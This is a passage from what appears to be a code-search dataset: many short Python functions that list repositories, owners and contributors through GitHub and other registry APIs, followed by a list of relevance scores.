repos = ['feature', 'dev', 'int']\n else:\n repos = []\n\n return repos", "def _get_repo_contributors(self, owner, repo):\n url = f\"{BASE_URL}/repos/{owner}/{repo}/contributors\"\n return self.fetch_all_pages(url, flatten=True, query_params={\"per_page\": 100})", "def addons_repositories(self) -> list[str]:\n return self._data[ATTR_ADDONS_CUSTOM_LIST]", "def fetch_repos(self):\n logging.info(\"Fetching repositories in: %s\" % self.name)\n list_cmd = [\n \"az\",\n \"acr\",\n \"repository\",\n \"list\",\n \"-n\",\n self.name,\n \"-o\",\n \"tsv\",\n ]\n\n result = run_cmd(list_cmd)\n\n if result[\"returncode\"] != 0:\n logging.error(result[\"err_msg\"])\n raise AzureError(result[\"err_msg\"])\n\n logging.info(\"Successfully fetched repositories from: %s\" % self.name)\n repos = result[\"output\"].split(\"\\n\")[:-1]\n logging.info(\"Total number of repositories: %d\" % len(repos))\n\n return repos", "def get_owners_list(self):\n final_list = []\n for entry in self.bot_data_file[\"owners_data\"][\"owners_list\"]:\n final_list.append(str(entry[\"name\"]))\n if len(final_list) == 0:\n print(\"ERROR GETTING THE OWNERS LIST (i need at least 1 owner) - BOT ABORTING\")\n quit(1)\n else:\n return final_list", "def get_repo_contributors(owner, repo, session=None):\n url = f'{GITHUB_API_URL}/repos/{owner}/{repo}/stats/contributors'\n contributors = []\n for contributor in get_whole_response_as_json(url, session):\n contributor['login'] = contributor['author']['login']\n contributors.append(contributor)\n return contributors", "def getuserrepos(gh, user):\n repos = list()\n pages = int(math.ceil(n_public_repos(gh, user) / float(R_PAGE)))\n for i in range(pages):\n # github index their pages from 1, hence the +1\n qs = user + \"/repos?page=\" + str(i + 1)\n repos.extend(gh.users(qs).get())\n return repos", "def _get_org_repos(self):\n url = f\"{BASE_URL}/orgs/{ORG}/repos\"\n return self.fetch_all_pages(url, flatten=True, query_params={\"per_page\": 100})", "def list_all_repos_info():\n repos = ALL_REPOS\n for repo_name, repo in zip(repos, _repos(repos)):\n repo_name = shorten_path(repo_name)\n print(repo_name)\n try:\n nbr_ahead, nbr_behind = _nbr_commits_ahead_and_behind(repo)\n except git.exc.GitCommandError:\n print(f\" {repo.active_branch.name}\")\n except DetachedHeadError:\n print(f\" HEAD --> {repo.head.commit}\")\n else:\n nb_tabul = 3 if len(repo.active_branch.name) < 6 else 2\n tabuls = \"\\t\" * nb_tabul\n print(f\" {repo.active_branch.name}{tabuls}↓ {nbr_behind} ↑ {nbr_ahead}\")\n if repo.index.diff(None):\n print(\" !!! With unstaged changes !!!\")\n if repo.index.diff(\"HEAD\"):\n print(\" !!! With uncommited changes !!!\")", "def repos(self):\r\n return repos.Repos(self)", "def get_repositories():\n\n repos = json.loads(\n common.run_ffx_command(cmd=('--machine', 'json', 'repository', 'list'),\n check=True,\n capture_output=True).stdout.strip())\n to_prune = set()\n sdk_root_abspath = os.path.abspath(os.path.dirname(common.SDK_ROOT))\n for repo in repos:\n # Confirm the path actually exists. 
If not, prune list.\n # Also assert the product-bundle repository is for the current repo\n # (IE within the same directory).\n if not os.path.exists(repo['spec']['path']):\n to_prune.add(repo['name'])\n\n if not repo['spec']['path'].startswith(sdk_root_abspath):\n to_prune.add(repo['name'])\n\n repos = [repo for repo in repos if repo['name'] not in to_prune]\n\n remove_repositories(to_prune)\n return repos", "def get_repositories(self) -> None:\n\n self.log.info(\"Fetching repositories for %s\", self.name)\n\n catalog = self.raw_client.get_catalog().json()\n self.log.info(\"Found the following repositories in registry %s:\", self.name)\n for repo in catalog['repositories']:\n tags = self.raw_client.get_tags(repo).json()['tags']\n if tags is None:\n tags = []\n self.log.debug(\"\\t%s with %s tags\", repo, len(tags))\n self.repositories[repo] = Repository(name=repo, registry=self, tags=tags)\n self.log.info(self.repositories[repo])", "def get_repos_user(user='xmonader'):\n u = ghclient.get_user(login=user)\n repos = u.get_repos()\n repos_list = []\n for i in range(20):\n page = repos.get_page(i)\n if len(page) == 0:\n break\n repos_list.extend(repos.get_page(i))\n return repos_list", "def get_repos(self):\n\t\tsession = self.login()\n\t\titems = session.query(Repos)\n\t\tresponse = [row2dict(item) for item in items]\n\n\t\tself.logout(session)\n\t\treturn response", "def get_repositories(\n self, *, params: Optional[dict] = None\n ) -> \"resource_types.Repositories\":\n\n return communicator.Repositories(self.__requester).fetch(parameters=params)", "def list_imported_repos():\n repos = dict()\n # sys.modules should be a dict listing all imported modules and packages, even if they were imported by importing a\n # single function from them. We don't try to cut this down by comparing with globals() because:\n # 1. if a module/package/etc was imported as a dependency, we want to include it, and I doubt that globals() will\n # show that\n # 2. we're filtering for modules/packages/etc that exist in their Git repo, so this will exclude the majority of\n # packages installed via pip/conda/etc.\n for name, mod in sys.modules.items():\n try:\n this_repo = _get_git_repo(mod.__file__)\n except AttributeError:\n # Some modules do not have a __file__ attribute. If that's the case, we can be reasonably sure that they\n # do not have a git repo, so skip them.\n continue\n\n if this_repo is None:\n # Not in a repo, don't list it\n continue\n\n if this_repo.git_dir in repos.keys():\n prev_entry = repos[this_repo.git_dir]\n # Always use the shortest name for the module, assume that that is the top level of the package. Note:\n # this might need revisited with submodules/subrepos. It looks like, at least when importing modules, the\n # top level package gets included in the modules list, so this should always get the top level module, or\n # at least the top level one that has a git repo.\n if len(prev_entry['name']) > len(name):\n prev_entry['name'] = name\n else:\n repos[this_repo.git_dir] = {'name': name, 'repo': this_repo}\n\n # Organizing the repos dict with the paths as the key was just for convenience while updating to get the shortest\n # package name. It's nicer upon returning for the dict key to be the package name and the path to be in the value\n # dict. 
And we don't need to keep the path b/c it's in the repo object\n return {val['name']: val['repo'] for val in repos.values()}", "def getInfo(self):\n # get repos name\n result = {}\n for item in self.repos:\n info = self.get_details(repo=item)\n result[item] = info\n\n return result", "def organizations(self):\n return self.get('{}/orgs'.format(ApiVersion.A1.value))", "def fake_get_user_repo_names_and_locations(self):\n self._get_user_repo_names_and_locations()", "def owners(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"owners\")", "def contributors(owner: str, repo: str, uname: Optional[str] = typer.Argument(None)):\n typer.echo(github.find_contributors_from_repo(owner=owner, repo=repo, uname=uname))", "def list_repos_cli(api_client, path_prefix, next_page_token):\n content = ReposApi(api_client).list(path_prefix, next_page_token)\n click.echo(pretty_format(content))", "def get_repo_names(sheet, json_key):\n # Use creds to create a client to interact with the Google Drive API\n scope = ['https://spreadsheets.google.com/feeds']\n creds = ServiceAccountCredentials.from_json_keyfile_name(json_key, scope)\n client = gspread.authorize(creds)\n \n \n # Load repos from the spreadsheet\n try:\n records = client.open(sheet).get_worksheet(0).get_all_records()\n rtrn = list({rec[\"repo_name\"] for rec in records if rec[\"use_repo\"] == 1})\n rtrn.sort()\n print(\"Got %s repos.\" %(len(rtrn)))\n return rtrn\n except gspread.exceptions.SpreadsheetNotFound as e:\n print(\"\\nSpreadsheet not found. Did you share the sheet with the client email in your JSON oauth file?\")\n all_sheets = client.openall()\n for s in all_sheets:\n print(s.title)\n print(\"\\n\")\n raise e", "def list_orgs(self):\n orgs = list(self.orgs.keys())\n orgs.sort()\n return orgs", "def get_repo_options(account, **kwargs):\n client = AsyncHTTPClient()\n uri = \"https://api.github.com/user/repos?per_page=100\"\n data = []\n while uri is not None:\n req = account.get_request(uri, headers={\"Accept\": \"application/vnd.github.moondragon+json\"})\n response = yield client.fetch(req)\n response_object = json.loads(response.body.decode('utf-8'))\n data += response_object\n links = parse_link_header(response.headers.get('Link', ''))\n uri = links.get('next', None)\n return [{\"title\": repo['full_name'], \"value\": repo['full_name']}\n for repo in data]", "def user_repos(self, username: str) -> requests.Response:\n\n api_url = 'https://api.github.com/users/{username}/repos'\n url = api_url.format(username=username)\n response = requests.get(url)\n return response\n\n\n\n #user_url = self.user_info(username=username)\n #repos_url = user_url\n #pprint.pprint(repos_url)\n #url = repos_url['repos_url']\n #response = requests.get(url)\n #return response", "def get_owners_command(client: Client) -> COMMAND_OUTPUT: # pragma: no cover\n url = '/api/v3/security/owners?resultLimit=500'\n response, status = client.make_request(Method.GET, url)\n\n readable_output: str = tableToMarkdown(name=f\"{INTEGRATION_NAME} - Owners\",\n t=list(response))\n\n return readable_output, {}, list(response)", "def repository_projects(self, host: (str), owner: (str), repo: (str)) -> Any:\n\n return search_api(\"repository_projects\", host, owner, repo)", "def get_repo_packages() -> List['Package']:\n return Package.get_packages_from_expac(\"-S\", [], PossibleTypes.REPO_PACKAGE)", "def owners(self):\n return self.properties.get('owners',\n DirectoryObjectCollection(self.context, ResourcePath(\"owners\", self.resource_path)))", "def 
repo_info(self, attempt=1):\n\n response = self.postman.request('repo_list', page=attempt)\n\n if (response.status_code == requests.codes.ok):\n if (len(response.json()) != 0):\n for repo in response.json():\n self.repo_list.append(repo['name'])\n\n self.repo_info(attempt=attempt + 1)", "def find_repos(source_connection):\n\n #TODO\n # Check version to avoid hard coding\n # \n\n cassandra_home = find_binary_path(source_connection)\n repositories = []\n\n if cassandra_home != \"\":\n # cassandra home is defined\n name = \"Cassnadra ({})\".format(\"3.6\")\n repository_definition = RepositoryDefinition(cassandra_home = cassandra_home, pretty_name=name)\n repositories.append(repository_definition)\n\n return repositories", "def list_collaborator_repos(self):\n user = User.objects.get(username=self.username)\n\n return Collaborator.objects.filter(user=user)", "def get_repos(cls):\n dcSql = DevCenterSQL()\n repos = dcSql.get_repos()\n return {'status': True, 'data': repos}", "def get_all_repos(oauth_token, repo_name):\n print('Checking if the user can access the repo...')\n g = Github(oauth_token)\n print('\\tRunning as ' + g.get_user().name)\n all_repos = g.get_user().get_repos()\n all_repos_full_name = []\n for test in list(all_repos):\n all_repos_full_name.append(test.full_name)\n if repo_name in all_repos_full_name:\n return True\n else:\n print('Repo \"' + repo_name + '\" is not in the list')\n print('Here\\'s a list of all repos I can see:')\n for each_repo in all_repos:\n print('\\t' + each_repo.full_name)\n return False", "def _list_repos(is_json):\n\n package_manager = _get_package_manager()\n repos = package_manager.get_repos()\n\n if is_json:\n return emitter.publish(repos)\n elif repos.get(\"repositories\"):\n repos = [\"{}: {}\".format(repo.get(\"name\"), repo.get(\"uri\"))\n for repo in repos.get(\"repositories\")]\n emitter.publish(\"\\n\".join(repos))\n else:\n msg = (\"There are currently no repos configured. 
\"\n \"Please use `dcos package repo add` to add a repo\")\n raise DCOSException(msg)\n\n return 0", "def repo_info():\n return TEST_REPOS_INFO[0]", "def get_repos(self):\n return [\n section for section in self.sections()\n if section not in self.reserved_sections\n ]", "def getContributors(auth):\n users = []\n r = requests.get(url='https://gist.github.com/paulmillr/2657075/',\n auth=auth)\n soup = BeautifulSoup(r.text, 'html.parser')\n users = [tr.select_one('a').text for tr in soup('tbody')[0].select('tr')]\n return users", "def getuserrepos_keys(gh, user):\n repos = getuserrepos(gh, user)\n return repos[0].keys()", "def test_print_security_repositories(self):\n self._uri({\n '%d.%d/maintained/sec%d/%s/Packages.gz' % (MAJOR, MINOR, 1, 'all'): DATA,\n '%d.%d/maintained/sec%d/%s/Packages.gz' % (MAJOR, MINOR, 1, ARCH): DATA,\n })\n tmp = self.u.print_security_repositories()\n self.assertEqual(set((\n 'deb file:///mock/%d.%d/maintained/ sec%d/%s/' % (MAJOR, MINOR, 1, 'all'),\n 'deb file:///mock/%d.%d/maintained/ sec%d/%s/' % (MAJOR, MINOR, 1, ARCH),\n )), set(tmp.splitlines()))", "def collect_org_repos(self):\n log.info(\"GHUB\", \"Collecting org repos.\")\n raw_repos = self._get_org_repos()\n preprocessed_repos = self._preprocess_repos(raw_repos)\n parsed_repos = json_reducer.reduce(REPOS_SCHEMA, preprocessed_repos)\n result = []\n for repo in parsed_repos:\n result.append(repo)\n return result", "def repositories(self):\n return [\n self.collection(self._registered_types[key])\n for key in self._registered_types\n ]", "def get_packages():\n packages = []\n for repo in repositories:\n packages.extend(repo.get_packages())\n return packages", "def get(self, *args, **kwargs):\r\n url = '{0}/user/repositories/'.format(self.parent.get_url())\r\n return http.Request('GET', url), parsers.parse_json", "def print(self):\n print(\"Repository list: \")\n for repo in self.list:\n print(\"- \" + repo.name)", "def get_members_repos(org_list):\n print(\"\\nGetting repositories of all members.\")\n jsonMembersRepo_list = []\n columns_list = [\n 'organization',\n 'user',\n 'full_name',\n 'fork',\n 'stargazers_count',\n 'forks_count',\n 'language',\n 'description'\n ]\n for org in org_list:\n print('\\nGetting members of', org)\n jsonMembers = load_json(\"https://api.github.com/orgs/\" + org +\n \"/members?per_page=100\")\n for member in jsonMembers:\n print('Getting repositories of', member['login'])\n jsonMembersRepos = load_json(\"https://api.github.com/users/\" +\n member['login'] +\n \"/repos?per_page=100\")\n for repo in jsonMembersRepos:\n # Add fields to make CSV file more usable\n repo['organization'] = org\n repo['user'] = member['login']\n # Python 2: Using smart_str to deal with encodings\n repo['description'] = smart_str(repo['description'])\n jsonMembersRepo_list.append(repo)\n generate_csv(\"members-list\", jsonMembersRepo_list, columns_list)", "def getPropertyOwners(self) -> List[unicode]:\n ...", "def get_all_contributors(request):\n response_dict = {}\n for project in constants.ACTIVE_REPOSITORIES:\n try:\n api_response = requests.get(\n constants.GITHUB_API_GET_CONTRIBUTORS_URL.format(project_name=project)\n )\n api_response_json = api_response.json()\n # if authentication fails\n if api_response.status_code == 401:\n raise Exception(\"Authentication fails. 
Invalid github access token.\")\n for contributor in api_response_json:\n if contributor['type'] != 'User':\n continue\n result = ContributorResponse(\n username=contributor['login'],\n url=contributor['html_url'],\n avatar_url=contributor['avatar_url'],\n contributions=contributor['contributions'],\n repository_name=[project],\n )\n if result.username in response_dict.keys():\n response_dict[result.username]['contributions'] += result.contributions\n response_dict[result.username]['repository_name'].append(project)\n else:\n response_dict[result.username] = result.to_json()\n except Exception:\n return DOWNSTREAM_ERROR_RESPONSE\n response = sorted(response_dict.values(), key=lambda x: x['contributions'], reverse=True)\n return Response(response)", "def list_(ctx: click.Context, repository_path):\n root_commands.cmd_list(ctx.obj, repository_path)", "def get_starred_repos(org_list):\n print(\"\\nGetting repositories starred by members.\")\n jsonMembersStarred_list = []\n columns_list = [\n 'organization',\n 'user',\n 'full_name',\n 'html_url',\n 'language',\n 'description'\n ]\n for org in org_list:\n print('\\nGetting members of', org)\n jsonMembers = load_json(\"https://api.github.com/orgs/\" + org +\n \"/members?per_page=100\")\n for member in jsonMembers:\n print('Getting starred repositories of', member['login'])\n jsonStarred = load_json(\"https://api.github.com/users/\" +\n member['login'] +\n \"/starred?per_page=100\")\n for repo in jsonStarred:\n repo['organization'] = org\n repo['user'] = member['login']\n # Python 2: Using smart_str to deal with encodings\n repo['description'] = smart_str(repo['description'])\n jsonMembersStarred_list.append(repo)\n generate_csv(\"starred-list\", jsonMembersStarred_list, columns_list)", "def list_repositories(self, state=None, json_out=False):\n states = ['active', 'archived', 'imported'] if state is None else [state]\n results = {}\n for get_state in states:\n repositories, errors = self.rest.get_backup_service_repositories(state=get_state)\n _exit_if_errors(errors)\n results[get_state] = repositories\n\n if json_out:\n print(json.dumps(results, indent=2))\n else:\n self.human_friendly_print_repositories(results)", "def get_org_list():\r\n\r\n resp = requests.get(''.join([Kegg.BASE_URL, 'list/organism']))\r\n return resp.text", "def list_all_organizations(ctx):\n pprint(ctx.obj.orgs.get().data)", "def get_owned_databases(cursor: Cursor, owner: Owner) -> List[str]:\n try:\n role = pgsql.get_role(cursor, owner_name(owner))\n except KeyError:\n return []\n else:\n return pgsql.get_role_databases(cursor, role)", "def get_ontology_contributors(repo_path):\n url = 'https://api.github.com/repos/{}/contributors'.format(repo_path)\n # TODO: allow use of oath token;\n # GH has a quota for non-logged in API calls\n time.sleep(3)\n with closing(requests.get(url, stream=False)) as resp:\n ok = resp.status_code == 200\n if ok:\n results = resp.json()\n logging.info(\"RESP={}\".format(results))\n return results\n else:\n logging.error(\"Failed: {}\".format(url))\n return []", "def owners(self):\n return self.find_users_by_rel('owner')", "def fetch_all_repos_info():\n\n def fetch(*args, **kwargs):\n kwargs[\"remote\"].fetch()\n\n repos = ALL_REPOS\n for repo_name, repo in zip(repos, _repos(repos)):\n repo_name = shorten_path(repo_name)\n print(f\"fetching {repo_name}\")\n _try_for_all_remotes(\n repo, fetch, raise_on_exception=False, stop_on_success=False, verbose=True\n )", "def repository(self, host: (str), owner: (str), repo: (str)) -> Any:\n\n return 
search_api(\"repository\", host, owner, repo)", "def user_repositories(self, host: (str), user: (str)) -> Any:\n return search_api(\"user_repositories\", host, user)", "def get_public_repos(self, max_repos=DEFAULT_MAX_PUBLIC_REPOS):\n since = 0\n repo_count = 0\n repos = []\n while repo_count < max_repos:\n temp = self.process_repo(self.get_full_url(ALL_REPO_LIST.format(since=since)), True)\n repos.extend(temp)\n repo_count = len(repos) #TODO count if repos <= max_repos\n print 'repos =', len(repos), 'temp=', len(temp)\n since = temp[-1]['id']\n\n return repos", "def describe_repositories(self, registry_id=None, repository_names=None):\n if repository_names:\n for repository_name in repository_names:\n if repository_name not in self.repositories:\n raise RepositoryNotFoundException(\n repository_name, registry_id or DEFAULT_REGISTRY_ID\n )\n\n repositories = []\n for repository in self.repositories.values():\n # If a registry_id was supplied, ensure this repository matches\n if registry_id:\n if repository.registry_id != registry_id:\n continue\n # If a list of repository names was supplied, esure this repository\n # is in that list\n if repository_names:\n if repository.name not in repository_names:\n continue\n repositories.append(repository.response_object)\n return repositories", "def get(self) -> Iterable[instarepo.github.Repo]:\n return self._filter_pushed_after(\n self._filter_pushed_before(\n self._filter_language(\n self._filter_prefix(\n self._filter_forks(\n self._filter_archived(\n self.github.get_all_repos(self.sort, self.direction)\n )\n )\n )\n )\n )\n )", "def test_list_repos():\n repos = common_funcs.list_repos()\n\n assert isinstance(repos, list)", "def repository_dependencies(self, host: (str), owner: (str), repo: (str)) -> Any:\n\n return search_api(\"repository_dependencies\", host, owner, repo)", "def get_repositories(github_user):\n\n if not github_user:\n return [1, {\"message\": \"GitHub username missing\"}]\n else:\n\n # build Request object\n request = urllib2.Request(\"https://api.github.com/users/\"\n + str(github_user) + \"/repos\")\n request.get_method = lambda: 'GET'\n try:\n '''try to send the request to the GitHub API and\n create Python dictionary from JSON response'''\n repositories = urllib2.urlopen(request)\n repositories = json.loads(\"\\n\".join(repositories.readlines()))\n\n return [0, repositories]\n\n except urllib2.HTTPError as e:\n\n # return HTTP error and the message from the API\n return [1, {\"message\": str(e) + \": \"\n + json.loads('\\n'.join(e.readlines()))['message']}]", "def lookup_allowed_private_repos(namespace):\n repos_allowed = 0\n current_plan = get_namespace_plan(namespace)\n\n if features.RH_MARKETPLACE:\n namespace_user = model.user.get_namespace_user(namespace)\n\n subscriptions = check_internal_api_for_subscription(namespace_user)\n for subscription in subscriptions:\n if subscription is not None:\n repos_allowed += subscription[\"privateRepos\"]\n\n # Find the number of private repositories used by the namespace and compare it to the\n # plan subscribed.\n if current_plan is not None:\n repos_allowed += current_plan[\"privateRepos\"]\n\n private_repos = model.user.get_private_repo_count(namespace)\n return private_repos < repos_allowed", "def list_repository_directory(self, entity):\n\n members = []\n\n # There is no directory object if this is the repository root\n path = ''\n if 'directory' in entity.objects:\n path = entity.objects['directory']['path']\n\n for entry in 
self.cache.get_repository_tree(entity.objects['project'], entity.objects['ref'], path):\n if entry['type'] in ('blob', 'tree'):\n members.append(entry['name'])\n\n return members", "def fetch_owner_accounts():\n resp = oauth.tapkey.get('Owners')\n owner_accounts = resp.json()\n return owner_accounts", "def org_info(self):\n\n response = self.postman.request('info')\n\n if (response.status_code == requests.codes.ok):\n data = response.json()\n\n self.repos = data['public_repos']\n self.created = data['created_at']\n self.updated = data['updated_at']\n\n self.repo_info()\n self.member_info()", "def owners(self):\n return self._owners", "def owners(self):\n return self._owners", "def project_owners(limit=None):\n tx = cypher_transaction()\n query = \"\"\"MATCH (p:project)-[:OWNED_BY]->(u:user) RETURN u, p\"\"\"\n if limit is not None:\n query += \" LIMIT {limit}\"\n tx.append(query, parameters={'limit': limit})\n else:\n tx.append(query)\n\n results = tx.commit()\n owners = [] # Just a list of user nodes\n for record in _first(results):\n user, project = record.values\n print(\"{0} is owned by {1}\".format(project['name'], user['name']))\n owners.append(user)\n return owners" ]
[ "0.7608418", "0.7267118", "0.7101556", "0.70416945", "0.6976196", "0.69618136", "0.6874849", "0.6862077", "0.68582284", "0.68060064", "0.6804673", "0.6765574", "0.67367995", "0.67278445", "0.67108905", "0.66979", "0.6602462", "0.6571694", "0.65691054", "0.6552383", "0.6520411", "0.6479025", "0.64617926", "0.64311785", "0.64091647", "0.6400867", "0.6396747", "0.63924646", "0.6376847", "0.6374998", "0.6339376", "0.62980723", "0.62977654", "0.6275646", "0.6261007", "0.6259236", "0.6232033", "0.6226945", "0.62142205", "0.62026376", "0.61564124", "0.61549956", "0.6141024", "0.6136196", "0.6121799", "0.61130077", "0.61064935", "0.6103521", "0.6072846", "0.60516536", "0.60421103", "0.60096735", "0.59917104", "0.597065", "0.5965023", "0.59428895", "0.59301186", "0.5928308", "0.5920155", "0.59060913", "0.5893575", "0.5890095", "0.58853257", "0.58802027", "0.58780503", "0.58733046", "0.58700955", "0.58527195", "0.58524054", "0.58512104", "0.58388853", "0.58153087", "0.5814408", "0.58134896", "0.5811761", "0.5799641", "0.5796002", "0.57940966", "0.57786024", "0.57735777", "0.5751356", "0.57505447", "0.5736426", "0.5731422", "0.5730501", "0.5727629", "0.5705432", "0.5685909", "0.5685506", "0.5674843", "0.567163", "0.56710416", "0.56416935", "0.5640376", "0.56359553", "0.56357026", "0.5631973", "0.563041", "0.563041", "0.5624084" ]
0.78467643
0
Get dict of labels with colors for given repository slug
def list_labels(self, repository): data = self._get_all_data('/repos/{}/labels'.format(repository)) return {l['name']: str(l['color']) for l in data}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def colors_for_labels():\n colors = [(i * np.array([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1]) % 255).astype(np.uint8) for i in range(len(CATEGORY))]\n #colors = np.array(range(len(COCO_INSTANCE_CATEGORY_NAMES))) * np.array([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\n #colors = (colors % 255).numpy().astype(\"uint8\")\n return colors", "def get_colors():\n colors = {}\n for h in wn.synset('chromatic_color.n.01').hyponyms():\n colors[h.lemmas()[0].name()] = [l.name() for l in h.lemmas()]\n colors[h.lemmas()[0].name()].extend(all_hyponyms(h)) \n for h in wn.synset('achromatic_color.n.01').hyponyms():\n colors[h.lemmas()[0].name()] = [l.name() for l in h.lemmas()]\n colors[h.lemmas()[0].name()].extend(all_hyponyms(h)) \n return colors", "def make_labels(painting):\n labels = {}\n for dcTitleLang, dcTitle in \\\n painting['object']['proxies'][0]['dcTitle'].iteritems():\n labels[dcTitleLang] = {'language': dcTitleLang, 'value': dcTitle[0]}\n return labels", "def get_colour_map(self):\n try:\n return {'C# minor' : 'Grey', 'A major' : 'Red', 'D minor' : 'Green',\n 'Eb Purple': 'greenyellow', 'D major' : 'Pink', 'G major' : 'Orange',\n 'G minor': 'goldenrod', 'A minor' : 'indianred', 'C minor' : 'peachpuff',\n 'B minor' : 'deepskyblue', 'Ab Major' : 'firebrick', 'Eb / D# minor' : 'orchid',\n 'Ab major' : 'moccasin', 'G# minor' : 'slateblue', 'Eb major' : 'turquoise',\n 'C major' : 'tomato', 'B major' : 'darkmagenta', 'F major' : 'olivedrab',\n 'F minor' : 'olive', 'Bb major' : 'lightsteelblue', 'Db major' : 'plum',\n 'Bb minor' : 'mediumspringgreen', 'E minor' : 'lightsalmon',\n 'F# / Gb major' : 'gold', 'F# minor' : 'burlywood'}\n\n # If colour not found to match, return grey as a last resort\n except KeyError as e:\n print('Unmatched colour: {0}'.format(e))\n return 'Grey'", "def list_labels(service, repo):\n app = App()\n if repo:\n serv = app.get_service(service, repo=repo)\n else:\n serv = app.guess_service()\n repo_labels = serv.list_labels()\n if not repo_labels:\n print(\"No labels.\")\n return\n print(tabulate([\n (\n label.name,\n label.color,\n label.description\n )\n for label in repo_labels\n ], tablefmt=\"fancy_grid\"))", "def assign_colour_label_data(catl):\n\n logmstar_arr = catl.logmstar.values\n u_r_arr = catl.modelu_rcorr.values\n\n colour_label_arr = np.empty(len(catl), dtype='str')\n for idx, value in enumerate(logmstar_arr):\n\n # Divisions taken from Moffett et al. 
2015 equation 1\n if value <= 9.1:\n if u_r_arr[idx] > 1.457:\n colour_label = 'R'\n else:\n colour_label = 'B'\n\n if value > 9.1 and value < 10.1:\n divider = 0.24 * value - 0.7\n if u_r_arr[idx] > divider:\n colour_label = 'R'\n else:\n colour_label = 'B'\n\n if value >= 10.1:\n if u_r_arr[idx] > 1.7:\n colour_label = 'R'\n else:\n colour_label = 'B'\n \n colour_label_arr[idx] = colour_label\n \n catl['colour_label'] = colour_label_arr\n\n return catl", "def map_label_colors(array, ignore_vals=[0]):\n colset = [(166, 206, 227),\n (31, 120, 180),\n (178, 223, 138),\n (51, 160, 44),\n (251, 154, 153),\n (227, 26, 28),\n (253, 191, 111),\n (255, 127, 0),\n (202, 178, 214),\n (106, 61, 154),\n (255, 255, 153),\n (177, 89, 40)]\n levels = np.unique(array)\n levels = [l for l in levels if l not in ignore_vals]\n if len(levels) == 0:\n return\n if len(levels) == 1:\n return({levels[0]: colset[0]})\n step = len(colset) / (len(levels) - 1)\n\n col_idx = np.arange(0, len(colset), step)\n colors = {}\n for idx in range(len(levels)):\n colors[levels[idx]] = colset[col_idx[idx]]\n return colors", "def get_labels():\n return {\"contradiction\": 0, \"neutral\": 1, \"entailment\": 2}", "def milestone_labels(argv=None):\n argv = argv or sys.argv[1:]\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('color', help='color to make the labels')\n\n args = parser.parse_args(argv)\n\n session = GithubSession()\n\n labels = session.get_labels()\n\n labels_by_name = dict([(label['name'], label) for label in labels])\n\n for milestone in session.get_milestones():\n label_name = f'epic:{milestone[\"title\"]}'\n\n if label_name in labels_by_name:\n continue\n\n labels_by_name[label_name] = session.create_label(label_name, args.color)\n\n return labels_by_name", "def cvpr2018_labels():\n\n return {\n 0: 'others',\n 33: 'car',\n 34: 'motorcycle',\n 35: 'bicycle',\n 36: 'pedestrian',\n 38: 'truck',\n 39: 'bus',\n 40: 'tricycle'\n }", "def get_labels(pr_id):\n label_json = get_status_json(pr_id, 'labels')\n current_labels = [l['name'] for l in label_json]\n return current_labels", "def compute_color_for_labels(label):\n color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]\n return tuple(color)", "def compute_color_for_labels(label):\n color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]\n return tuple(color)", "def compute_color_for_labels(label):\n color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]\n return tuple(color)", "def compute_color_for_labels(label):\n color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]\n return tuple(color)", "def get_node_color(node_label):\n for NODE_KEY in list(NODE_TYPES.keys()):\n if node_label in NODE_TYPES[NODE_KEY]:\n return NODE_COLOR_DICT[NODE_KEY]\n try:\n x = int(node_label)\n return NODE_COLOR_DICT['Terminals']\n except:\n try:\n x = float(node_label)\n return NODE_COLOR_DICT['Terminals']\n except:\n try:\n node_label = node_label.replace(\"\\'\", \"\\\"\")\n tree = json.loads(node_label)\n for key in tree.keys():\n if key not in NODE_TYPES['Learner Params']:\n return NODE_COLOR_DICT['Uncategorized']\n else:\n try:\n x = int(tree[key])\n except:\n try:\n x = float(tree[key])\n except:\n return NODE_COLOR_DICT['Uncategorized']\n return NODE_COLOR_DICT['Learner Params']\n except:\n return NODE_COLOR_DICT['Uncategorized']\n return NODE_COLOR_DICT['Uncategorized']", "def compute_colors_for_labels(self, labels):\n colors = labels[:, None] * self.palette\n colors = (colors % 
255).numpy().astype(\"uint8\")\n return colors", "def compute_colors_for_labels(self, labels):\n colors = labels[:, None] * self.palette\n colors = (colors % 255).numpy().astype(\"uint8\")\n return colors", "def labels(self):\r\n return labels.RepoLabels(self)", "def ColorsLabel(*args):\n return _XCAFDoc.XCAFDoc_DocumentTool_ColorsLabel(*args)", "def compute_color_for_labels(label):\n\tcolor = [int((p * (label**2 - label + 1)) % 255) for p in palette]\n\treturn tuple(color)", "def _create_color_lot(color_names, color_subnames, color_dict_rgb):\n lot = {}\n i = 0\n for sn in np.arange(len(color_subnames)):\n for n in np.arange(len(color_names)):\n lot[i] = color_dict_rgb[color_names[n]][color_subnames[sn]]\n i += 1\n\n return lot", "def _create_color_map(self):\n unique_labels = np.unique(self.out_labels)\n color_map = {}\n for unique_label in unique_labels:\n color_map[unique_label] = self._random_color()\n\n return color_map", "def _read_color_labels(filename):\n line_parser = lambda line: (int(line.split(',')[0]), line.split(',')[-1])\n with open(filename, 'r') as labels:\n label_map = dict([line_parser(line.strip()) for line in labels])\n return label_map", "def colors(self) -> dict:\n raise NotImplementedError", "def plot_colour(self, label):\n label = label.lower()\n pretty_colours = {}\n # SPIce HD\n pretty_colours['544'] = 'maroon'\n pretty_colours['545'] = 'goldenrod'\n pretty_colours['548'] = 'blueviolet'\n pretty_colours['549'] = 'forestgreen'\n # H2\n ## DOM Efficiency Sets\n pretty_colours['551'] = 'cornflowerblue'\n pretty_colours['552'] = 'cornflowerblue'\n pretty_colours['553'] = 'cornflowerblue'\n pretty_colours['554'] = 'mediumseagreen'\n pretty_colours['555'] = 'mediumseagreen'\n pretty_colours['556'] = 'mediumseagreen'\n ## Hole Ice Sets\n pretty_colours['560'] = 'olive'\n pretty_colours['561'] = 'olive'\n pretty_colours['564'] = 'darkorange'\n pretty_colours['565'] = 'darkorange'\n pretty_colours['572'] = 'teal'\n pretty_colours['573'] = 'teal'\n ## Dima Hole Ice Set without RDE\n pretty_colours['570'] = 'mediumvioletred'\n ## Baseline\n pretty_colours['585'] = 'slategrey'\n # Systematics\n pretty_colours['aeff_scale'] = 